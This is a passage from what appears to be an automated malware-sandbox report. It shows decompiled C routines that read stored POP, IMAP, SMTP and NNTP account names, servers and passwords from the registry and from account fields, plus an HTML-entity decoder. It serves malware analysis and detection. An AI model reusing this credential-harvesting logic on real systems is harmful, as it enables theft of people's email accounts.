                                                                          • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                          • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                                          • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                        • strcpy.MSVCRT(?,?), ref: 00402EB1
                                                                        • strcpy.MSVCRT(?,?,?,?), ref: 00402EC4
                                                                        • strcpy.MSVCRT(?,?), ref: 00402F51
                                                                        • strcpy.MSVCRT(?,?,?,?), ref: 00402F5E
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402FB8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcpy$QueryValue$CloseOpen
                                                                        • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                        • API String ID: 4127491968-1534328989
                                                                        • Opcode ID: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                                        • Instruction ID: 43883d4594eb94b0077ee0611f04b7cce421852a2964d1822423da303833eb9e
                                                                        • Opcode Fuzzy Hash: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                                        • Instruction Fuzzy Hash: 5D514AB1A0021CBADB11EB56CD41FDE777CAF04354F1084A7BA08B2191D7B8ABA5CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040F808, Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 99%
                                                                        			E0040F808(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v11;
				char _v12;
				char _v13;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				short _v30;
				short _v32;
				char* _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char _v76;
				void _v88;
				intOrPtr _v92;
				char* _v96;
				char* _v100;
				intOrPtr _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				intOrPtr _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				intOrPtr _v156;
				char* _v160;
				char* _v164;
				char* _v168;
				intOrPtr _v172;
				char* _v176;
				char* _v180;
				char* _v184;
				char* _v188;
				char* _v192;
				char* _v196;
				intOrPtr _v200;
				char* _v204;
				char* _v208;
				char* _v212;
				char* _v216;
				char* _v220;
				char* _v224;
				char* _v228;
				intOrPtr _v232;
				char* _v236;
				char* _v240;
				char* _v244;
				char* _v248;
				char* _v252;
				intOrPtr _v256;
				char* _v260;
				char* _v264;
				char* _v268;
				char* _v272;
				char* _v276;
				char* _v280;
				intOrPtr _v284;
				char* _v288;
				char* _v292;
				char* _v296;
				intOrPtr _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				intOrPtr _v328;
				char* _v332;
				char* _v336;
				char* _v340;
				char* _v344;
				char* _v348;
				char* _v352;
				char* _v356;
				char* _v360;
				char* _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				char* _v376;
				char* _v380;
				intOrPtr _v384;
				char* _v388;
				char* _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				char* _v404;
				char* _v408;
				intOrPtr _v412;
				char* _v416;
				char* _v420;
				char* _v424;
				char* _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				char* _v440;
				intOrPtr _v444;
				char* _v448;
				char* _v452;
				char* _v456;
				char* _v460;
				intOrPtr _v464;
				char* _v468;
				intOrPtr* _t200;
				char* _t202;
				char _t203;
				int _t205;
				int _t206;
				intOrPtr _t209;
				char* _t211;
				int _t213;
				void _t216;
				char _t220;
				void _t221;
				int _t226;
				signed int _t231;
				intOrPtr* _t232;
				void _t237;
				void* _t238;
				void* _t240;
				void* _t245;
				signed int _t246;
				signed int _t249;
				int _t250;
				void* _t251;
				int _t252;
				void* _t254;
				void* _t255;
				void* _t256;

				_v64 = "amp;";
				_v60 = "lt;";
				_v56 = "gt;";
				_v52 = "quot;";
				_v48 = "nbsp;";
				_v44 = "apos;";
				_v24 = 0x26;
				_v23 = 0x3c;
				_v22 = 0x3e;
				_v21 = 0x22;
				_v20 = 0x20;
				_v19 = 0x27;
				_v468 = "iexcl;";
				_v464 = "cent;";
				_v460 = "pound;";
				_v456 = "curren;";
				_v452 = "yen;";
				_v448 = "brvbar;";
				_v444 = "sect;";
				_v440 = "uml;";
				_v436 = "copy;";
				_v432 = "ordf;";
				_v428 = "laquo;";
				_v424 = "not;";
				_v420 = "shy;";
				_v416 = "reg;";
				_v412 = "macr;";
				_v408 = "deg;";
				_v404 = "plusmn;";
				_v400 = "sup2;";
				_v396 = "sup3;";
				_v392 = "acute;";
				_v388 = "micro;";
				_v384 = "para;";
				_v380 = "middot;";
				_v376 = "cedil;";
				_v372 = "sup1;";
				_v368 = "ordm;";
				_v364 = "raquo;";
				_v360 = "frac14;";
				_v356 = "frac12;";
				_v352 = "frac34;";
				_v348 = "iquest;";
				_v344 = "Agrave;";
				_v340 = "Aacute;";
				_v336 = "Acirc;";
				_v332 = "Atilde;";
				_v328 = "Auml;";
				_v324 = "Aring;";
				_v320 = "AElig;";
				_v316 = "Ccedil;";
				_v312 = "Egrave;";
				_v308 = "Eacute;";
				_v304 = "Ecirc;";
				_v300 = "Euml;";
				_v296 = "Igrave;";
				_v292 = "Iacute;";
				_v288 = "Icirc;";
				_v284 = "Iuml;";
				_v280 = "ETH;";
				_v276 = "Ntilde;";
				_v272 = "Ograve;";
				_v268 = "Oacute;";
				_v264 = "Ocirc;";
				_v260 = "Otilde;";
				_v256 = "Ouml;";
				_v252 = "times;";
				_v248 = "Oslash;";
				_v244 = "Ugrave;";
				_v240 = "Uacute;";
				_v236 = "Ucirc;";
				_v232 = "Uuml;";
				_v228 = "Yacute;";
				_v224 = "THORN;";
				_v220 = "szlig;";
				_v216 = "agrave;";
				_v212 = "aacute;";
				_v208 = "acirc;";
				_v204 = "atilde;";
				_t200 = _a8;
				_v28 = _v28 | 0xffffffff;
				_t231 = 0;
				_t254 = 0;
				_v200 = "auml;";
				_v196 = "aring;";
				_v192 = "aelig;";
				_v188 = "ccedil;";
				_v184 = "egrave;";
				_v180 = "eacute;";
				_v176 = "ecirc;";
				_v172 = "euml;";
				_v168 = "igrave;";
				_v164 = "iacute;";
				_v160 = "icirc;";
				_v156 = "iuml;";
				_v152 = "eth;";
				_v148 = "ntilde;";
				_v144 = "ograve;";
				_v140 = "oacute;";
				_v136 = "ocirc;";
				_v132 = "otilde;";
				_v128 = "ouml;";
				_v124 = "divide;";
				_v120 = "oslash;";
				_v116 = "ugrave;";
				_v112 = "uacute;";
				_v108 = "ucirc;";
				_v104 = "uuml;";
				_v100 = "yacute;";
				_v96 = "thorn;";
				_v92 = "yuml;";
				if( *_t200 == 0) {
					L45:
					_t202 = _a4 + _t231;
					 *_t202 = 0;
					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
						return _t202;
					} else {
						 *((char*)(_t202 - 1)) = 0;
						return _t202;
					}
				}
				while(_a12 == 0xffffffff || _a12 > _t254) {
					_t232 = _t254 + _t200;
					_t203 =  *_t232;
					_v13 = _t203;
					if(_t203 != 0x26) {
						L33:
						if(_a16 == 0 || _t203 > 0x20) {
							 *((char*)(_t231 + _a4)) = _t203;
							_t231 = _t231 + 1;
						} else {
							if(_t231 != _v28) {
								 *((char*)(_t231 + _a4)) = 0x20;
								_t231 = _t231 + 1;
								if(_a20 != 0 && _t231 == 1) {
									_t231 = 0;
								}
							}
							_v28 = _t231;
						}
						_t254 = _t254 + 1;
						L43:
						_t200 = _a8;
						if( *((char*)(_t254 + _t200)) != 0) {
							continue;
						}
						break;
					}
					_t249 = 0;
					_v36 = _t232 + 1;
					while(1) {
						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c));
						_v8 = _t205;
						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
						_t256 = _t256 + 0x10;
						if(_t206 == 0) {
							break;
						}
						_t249 = _t249 + 1;
						if(_t249 < 6) {
							continue;
						}
						_t209 = _a8;
						if( *((char*)(_t254 + _t209 + 1)) != 0x23) {
							L29:
							_v8 = _v8 & 0x00000000;
							while(1) {
								_t211 =  *(_t255 + _v8 * 4 - 0x1d0);
								_v40 = _t211;
								_t250 = strlen(_t211);
								_t213 = strncmp(_v36, _v40, _t250);
								_t256 = _t256 + 0x10;
								if(_t213 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 < 0x5f) {
									continue;
								}
								_t203 = _v13;
								goto L33;
							}
							 *((char*)(_t231 + _a4)) = _v8 - 0x5f;
							_t231 = _t231 + 1;
							_t254 = _t254 + _t250 + 1;
							goto L43;
						}
						_t128 = _t209 + 2; // 0x2
						_t251 = _t254 + _t128;
						_t237 =  *_t251;
						if(_t237 == 0x78 || _t237 == 0x58) {
							_t159 = _t209 + 3; // 0x3
							_t245 = _t254 + _t159;
							_t238 = _t245;
							_t252 = 0;
							while(1) {
								_t216 =  *_t238;
								if(_t216 == 0) {
									break;
								}
								if(_t216 == 0x3b) {
									L27:
									if(_t252 <= 0) {
										goto L29;
									}
									memcpy( &_v88, _t245, _t252);
									 *((char*)(_t255 + _t252 - 0x54)) = 0;
									_t220 = E00406512( &_v88);
									_t256 = _t256 + 0x10;
									 *((char*)(_t231 + _a4)) = _t220;
									_t231 = _t231 + 1;
									_t254 = _t254 + _t252 + 4;
									goto L43;
								}
								_t252 = _t252 + 1;
								if(_t252 >= 4) {
									break;
								}
								_t238 = _t238 + 1;
							}
							_t252 = _t252 | 0xffffffff;
							goto L27;
						} else {
							_t240 = _t251;
							_t246 = 0;
							while(1) {
								_t221 =  *_t240;
								if(_t221 == 0) {
									break;
								}
								if(_t221 == 0x3b) {
									_v8 = _t246;
									L18:
									if(_v8 <= 0) {
										goto L29;
									}
									memcpy( &_v76, _t251, _v8);
									 *((char*)(_t255 + _v8 - 0x48)) = 0;
									_t226 = atoi( &_v76);
									_t256 = _t256 + 0x10;
									_v32 = _t226;
									_v12 = 0;
									asm("stosb");
									_v30 = 0;
									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0);
									 *((char*)(_t231 + _a4)) = _v12;
									_t231 = _t231 + 1;
									_t254 = _t254 + _v8 + 3;
									goto L43;
								}
								_t246 = _t246 + 1;
								if(_t246 >= 6) {
									break;
								}
								_t240 = _t240 + 1;
							}
							_v8 = _v8 | 0xffffffff;
							goto L18;
						}
					}
					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
					_t231 = _t231 + 1;
					_t254 = _t254 + _v8 + 1;
					goto L43;
				}
				goto L45;
			}



















































































































































                                                                        0x0040f813
                                                                        0x0040f81a
                                                                        0x0040f821
                                                                        0x0040f828
                                                                        0x0040f82f
                                                                        0x0040f836
                                                                        0x0040f83d
                                                                        0x0040f841
                                                                        0x0040f845
                                                                        0x0040f849
                                                                        0x0040f84d
                                                                        0x0040f851
                                                                        0x0040f855
                                                                        0x0040f85f
                                                                        0x0040f869
                                                                        0x0040f873
                                                                        0x0040f87d
                                                                        0x0040f887
                                                                        0x0040f891
                                                                        0x0040f89b
                                                                        0x0040f8a5
                                                                        0x0040f8af
                                                                        0x0040f8b9
                                                                        0x0040f8c3
                                                                        0x0040f8cd
                                                                        0x0040f8d7
                                                                        0x0040f8e1
                                                                        0x0040f8eb
                                                                        0x0040f8f5
                                                                        0x0040f8ff
                                                                        0x0040f909
                                                                        0x0040f913
                                                                        0x0040f91d
                                                                        0x0040f927
                                                                        0x0040f931
                                                                        0x0040f93b
                                                                        0x0040f945
                                                                        0x0040f94f
                                                                        0x0040f959
                                                                        0x0040f963
                                                                        0x0040f96d
                                                                        0x0040f977
                                                                        0x0040f981
                                                                        0x0040f98b
                                                                        0x0040f995
                                                                        0x0040f99f
                                                                        0x0040f9a9
                                                                        0x0040f9b3
                                                                        0x0040f9bd
                                                                        0x0040f9c7
                                                                        0x0040f9d1
                                                                        0x0040f9db
                                                                        0x0040f9e5
                                                                        0x0040f9ef
                                                                        0x0040f9f9
                                                                        0x0040fa03
                                                                        0x0040fa0d
                                                                        0x0040fa17
                                                                        0x0040fa21
                                                                        0x0040fa2b
                                                                        0x0040fa35
                                                                        0x0040fa3f
                                                                        0x0040fa49
                                                                        0x0040fa53
                                                                        0x0040fa5d
                                                                        0x0040fa67
                                                                        0x0040fa71
                                                                        0x0040fa7b
                                                                        0x0040fa85
                                                                        0x0040fa8f
                                                                        0x0040fa99
                                                                        0x0040faa3
                                                                        0x0040faad
                                                                        0x0040fab7
                                                                        0x0040fac1
                                                                        0x0040facb
                                                                        0x0040fad5
                                                                        0x0040fadf
                                                                        0x0040fae9
                                                                        0x0040faf3
                                                                        0x0040faf6
                                                                        0x0040fafa
                                                                        0x0040fafc
                                                                        0x0040fb00
                                                                        0x0040fb0a
                                                                        0x0040fb14
                                                                        0x0040fb1e
                                                                        0x0040fb28
                                                                        0x0040fb32
                                                                        0x0040fb3c
                                                                        0x0040fb46
                                                                        0x0040fb50
                                                                        0x0040fb5a
                                                                        0x0040fb64
                                                                        0x0040fb6e
                                                                        0x0040fb78
                                                                        0x0040fb82
                                                                        0x0040fb8c
                                                                        0x0040fb96
                                                                        0x0040fba0
                                                                        0x0040fbaa
                                                                        0x0040fbb1
                                                                        0x0040fbb8
                                                                        0x0040fbbf
                                                                        0x0040fbc6
                                                                        0x0040fbcd
                                                                        0x0040fbd4
                                                                        0x0040fbdb
                                                                        0x0040fbe2
                                                                        0x0040fbe9
                                                                        0x0040fbf0
                                                                        0x0040fbf7
                                                                        0x0040fde5
                                                                        0x0040fde8
                                                                        0x0040fdee
                                                                        0x0040fdf1
                                                                        0x0040fe04
                                                                        0x0040fdfd
                                                                        0x0040fdfd
                                                                        0x00000000
                                                                        0x0040fdfd
                                                                        0x0040fdf1
                                                                        0x0040fbfe
                                                                        0x0040fc0d
                                                                        0x0040fc10
                                                                        0x0040fc14
                                                                        0x0040fc17
                                                                        0x0040fd94
                                                                        0x0040fd98
                                                                        0x0040fdd2
                                                                        0x0040fdd5
                                                                        0x0040fd9e
                                                                        0x0040fda1
                                                                        0x0040fda6
                                                                        0x0040fdaa
                                                                        0x0040fdaf
                                                                        0x0040fdb6
                                                                        0x0040fdb6
                                                                        0x0040fdaf
                                                                        0x0040fdb8
                                                                        0x0040fdb8
                                                                        0x0040fdd6
                                                                        0x0040fdd7
                                                                        0x0040fdd7
                                                                        0x0040fdde
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040fdde
                                                                        0x0040fc1d
                                                                        0x0040fc20
                                                                        0x0040fc23
                                                                        0x0040fc27
                                                                        0x0040fc31
                                                                        0x0040fc37
                                                                        0x0040fc3c
                                                                        0x0040fc41
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040fc43
                                                                        0x0040fc47
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040fc49
                                                                        0x0040fc51
                                                                        0x0040fd5c
                                                                        0x0040fd5c
                                                                        0x0040fd60
                                                                        0x0040fd63
                                                                        0x0040fd6b
                                                                        0x0040fd73
                                                                        0x0040fd7c
                                                                        0x0040fd81
                                                                        0x0040fd86
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040fd88
                                                                        0x0040fd8f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040fd91
                                                                        0x00000000
                                                                        0x0040fd91
                                                                        0x0040fdc5
                                                                        0x0040fdc8
                                                                        0x0040fdc9
                                                                        0x00000000
                                                                        0x0040fdc9
                                                                        0x0040fc57
                                                                        0x0040fc57
                                                                        0x0040fc5b
                                                                        0x0040fc60
                                                                        0x0040fd11
                                                                        0x0040fd11
                                                                        0x0040fd15
                                                                        0x0040fd17
                                                                        0x0040fd26
                                                                        0x0040fd26
                                                                        0x0040fd2a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040fd1d
                                                                        0x0040fd2f
                                                                        0x0040fd31
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040fd39
                                                                        0x0040fd42
                                                                        0x0040fd47
                                                                        0x0040fd4f
                                                                        0x0040fd52
                                                                        0x0040fd55
                                                                        0x0040fd56
                                                                        0x00000000
                                                                        0x0040fd56
                                                                        0x0040fd1f
                                                                        0x0040fd23
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040fd25
                                                                        0x0040fd25
                                                                        0x0040fd2c
                                                                        0x00000000
                                                                        0x0040fc6f
                                                                        0x0040fc6f
                                                                        0x0040fc71
                                                                        0x0040fc97
                                                                        0x0040fc97
                                                                        0x0040fc9b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040fc8e
                                                                        0x0040fd0c
                                                                        0x0040fca1
                                                                        0x0040fca5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040fcb3
                                                                        0x0040fcbb
                                                                        0x0040fcc4
                                                                        0x0040fcc9
                                                                        0x0040fcd4
                                                                        0x0040fce3
                                                                        0x0040fceb
                                                                        0x0040fcec
                                                                        0x0040fcf0
                                                                        0x0040fcfc
                                                                        0x0040fd02
                                                                        0x0040fd03
                                                                        0x00000000
                                                                        0x0040fd03
                                                                        0x0040fc90
                                                                        0x0040fc94
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040fc96
                                                                        0x0040fc96
                                                                        0x0040fc9d
                                                                        0x00000000
                                                                        0x0040fc9d
                                                                        0x0040fc60
                                                                        0x0040fc7c
                                                                        0x0040fc82
                                                                        0x0040fc83
                                                                        0x00000000
                                                                        0x0040fc83
                                                                        0x00000000

                                                                        APIs
                                                                        • strlen.MSVCRT ref: 0040FC27
                                                                        • strncmp.MSVCRT(?,00413F68,00000000,00413F68,?,?,?), ref: 0040FC37
                                                                        • memcpy.MSVCRT ref: 0040FCB3
                                                                        • atoi.MSVCRT ref: 0040FCC4
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040FCF0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                        • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                        • API String ID: 1895597112-3210201812
                                                                        • Opcode ID: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                        • Instruction ID: 7b61ab7fda62f62168f3ac6a9ee0746413b6f8a7e258cbbb94e4f4552fbd63bc
                                                                        • Opcode Fuzzy Hash: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                        • Instruction Fuzzy Hash: 49F139B08012589EDB21CF95D8487DEBFB0AF96308F5481EAD5593B241C7B94BC9CF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004106BE, Relevance: 80.8, APIs: 23, Strings: 23, Instructions: 309stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E004106BE(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				int _t58;
				int _t59;
				int _t60;
				int _t61;
				int _t63;
				void* _t96;
				void* _t99;
				void* _t102;
				void* _t105;
				void* _t108;
				void* _t111;
				void* _t114;
				void* _t117;
				void* _t123;
				void* _t194;
				void* _t196;
				void* _t201;
				char* _t202;

				_t194 = __edx;
				_t201 = __ecx;
				if(strcmp(__ecx + 0x46c, "Account_Name") == 0) {
					_t204 = _t201 + 0x460;
					E004060D0(0xff, _t201 + 0x870, E00406B74( *(_t201 + 0x460)));
					_t123 = E00406B74( *_t204);
					_t195 = _t201 + 0xf84;
					E004060D0(0xff, _t201 + 0xf84, _t123);
				}
				_t202 = _t201 + 0x46c;
				if(strcmp(_t202, "POP3_Server") == 0) {
					_t117 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t117);
				}
				if(strcmp(_t202, "IMAP_Server") == 0) {
					_t114 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t114);
				}
				if(strcmp(_t202, "NNTP_Server") == 0) {
					_t111 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t111);
				}
				if(strcmp(_t202, "SMTP_Server") == 0) {
					_t108 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1084;
					E004060D0(0xff, _t201 + 0x1084, _t108);
				}
				if(strcmp(_t202, "POP3_User_Name") == 0) {
					_t105 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t105);
					 *((intOrPtr*)(_t201 + 0xf70)) = 1;
				}
				if(strcmp(_t202, "IMAP_User_Name") == 0) {
					_t102 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t102);
					 *((intOrPtr*)(_t201 + 0xf70)) = 2;
				}
				if(strcmp(_t202, "NNTP_User_Name") == 0) {
					_t99 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t99);
					 *((intOrPtr*)(_t201 + 0xf70)) = 4;
				}
				if(strcmp(_t202, "SMTP_User_Name") == 0) {
					_t96 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1284;
					E004060D0(0xff, _t201 + 0x1284, _t96);
					 *((intOrPtr*)(_t201 + 0x1684)) = 3;
				}
				_t58 = strcmp(_t202, "POP3_Password2");
				_t214 = _t58;
				if(_t58 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t214, _t201, _t201 + 0x870);
				}
				_t59 = strcmp(_t202, "IMAP_Password2");
				_t215 = _t59;
				if(_t59 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t215, _t201, _t201 + 0x870);
				}
				_t60 = strcmp(_t202, "NNTP_Password2");
				_t216 = _t60;
				if(_t60 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t216, _t201, _t201 + 0x870);
				}
				_t61 = strcmp(_t202, "SMTP_Password2");
				_t217 = _t61;
				if(_t61 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t217, _t201, _t201 + 0xf84);
				}
				if(strcmp(_t202, "NNTP_Email_Address") == 0) {
					E004060D0(0xff, _t201 + 0xe70, E00406B74( *((intOrPtr*)(_t201 + 0x460))));
				}
				_t63 = strcmp(_t202, "SMTP_Email_Address");
				if(_t63 == 0) {
					_t203 = _t201 + 0x460;
					E004060D0(0xff, _t201 + 0xe70, E00406B74( *(_t201 + 0x460)));
					_t63 = E004060D0(0xff, _t201 + 0x1584, E00406B74( *_t203));
				}
				_push("SMTP_Port");
				_t196 = _t201 + 0x46c;
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x168c) = _t63;
				}
				_push("NNTP_Port");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					L35:
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0xf78) = _t63;
				} else {
					_push("IMAP_Port");
					_push(_t196);
					L004115DC();
					if(_t63 == 0) {
						goto L35;
					} else {
						_push("POP3_Port");
						_push(_t196);
						L004115DC();
						if(_t63 == 0) {
							goto L35;
						}
					}
				}
				_push("SMTP_Secure_Connection");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x1690) = _t63;
				}
				_push("NNTP_Secure_Connection");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					L41:
					 *((intOrPtr*)(_t201 + 0xf7c)) = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
				} else {
					_push("IMAP_Secure_Connection");
					_push(_t196);
					L004115DC();
					if(_t63 == 0) {
						goto L41;
					} else {
						_push("POP3_Secure_Connection");
						_push(_t196);
						L004115DC();
						if(_t63 == 0) {
							goto L41;
						}
					}
				}
				return 1;
			}























                                                                        0x004106be
                                                                        0x004106c2
                                                                        0x004106de
                                                                        0x004106e0
                                                                        0x004106f5
                                                                        0x004106fe
                                                                        0x00410704
                                                                        0x0041070a
                                                                        0x0041070f
                                                                        0x00410715
                                                                        0x00410725
                                                                        0x0041072d
                                                                        0x00410733
                                                                        0x00410739
                                                                        0x0041073e
                                                                        0x0041074e
                                                                        0x00410756
                                                                        0x0041075c
                                                                        0x00410762
                                                                        0x00410767
                                                                        0x00410777
                                                                        0x0041077f
                                                                        0x00410785
                                                                        0x0041078b
                                                                        0x00410790
                                                                        0x004107a0
                                                                        0x004107a8
                                                                        0x004107ae
                                                                        0x004107b4
                                                                        0x004107b9
                                                                        0x004107c9
                                                                        0x004107d1
                                                                        0x004107d7
                                                                        0x004107dd
                                                                        0x004107e3
                                                                        0x004107e3
                                                                        0x004107fc
                                                                        0x00410804
                                                                        0x0041080a
                                                                        0x00410810
                                                                        0x00410816
                                                                        0x00410816
                                                                        0x0041082f
                                                                        0x00410837
                                                                        0x0041083d
                                                                        0x00410843
                                                                        0x00410849
                                                                        0x00410849
                                                                        0x00410862
                                                                        0x0041086a
                                                                        0x00410870
                                                                        0x00410876
                                                                        0x0041087c
                                                                        0x0041087c
                                                                        0x0041088c
                                                                        0x00410891
                                                                        0x00410895
                                                                        0x004108aa
                                                                        0x004108aa
                                                                        0x004108b5
                                                                        0x004108ba
                                                                        0x004108be
                                                                        0x004108d3
                                                                        0x004108d3
                                                                        0x004108de
                                                                        0x004108e3
                                                                        0x004108e7
                                                                        0x004108fc
                                                                        0x004108fc
                                                                        0x00410907
                                                                        0x0041090c
                                                                        0x00410910
                                                                        0x00410925
                                                                        0x00410925
                                                                        0x00410939
                                                                        0x0041094d
                                                                        0x00410952
                                                                        0x00410959
                                                                        0x00410962
                                                                        0x00410964
                                                                        0x00410979
                                                                        0x0041098e
                                                                        0x00410993
                                                                        0x00410994
                                                                        0x00410999
                                                                        0x0041099f
                                                                        0x004109a0
                                                                        0x004109a9
                                                                        0x004109b7
                                                                        0x004109bd
                                                                        0x004109bd
                                                                        0x004109c3
                                                                        0x004109c8
                                                                        0x004109c9
                                                                        0x004109d2
                                                                        0x004109f6
                                                                        0x00410a02
                                                                        0x00410a08
                                                                        0x004109d4
                                                                        0x004109d4
                                                                        0x004109d9
                                                                        0x004109da
                                                                        0x004109e3
                                                                        0x00000000
                                                                        0x004109e5
                                                                        0x004109e5
                                                                        0x004109ea
                                                                        0x004109eb
                                                                        0x004109f4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004109f4
                                                                        0x004109e3
                                                                        0x00410a0e
                                                                        0x00410a13
                                                                        0x00410a14
                                                                        0x00410a1d
                                                                        0x00410a2b
                                                                        0x00410a31
                                                                        0x00410a31
                                                                        0x00410a37
                                                                        0x00410a3c
                                                                        0x00410a3d
                                                                        0x00410a46
                                                                        0x00410a6a
                                                                        0x00410a7c
                                                                        0x00410a48
                                                                        0x00410a48
                                                                        0x00410a4d
                                                                        0x00410a4e
                                                                        0x00410a57
                                                                        0x00000000
                                                                        0x00410a59
                                                                        0x00410a59
                                                                        0x00410a5e
                                                                        0x00410a5f
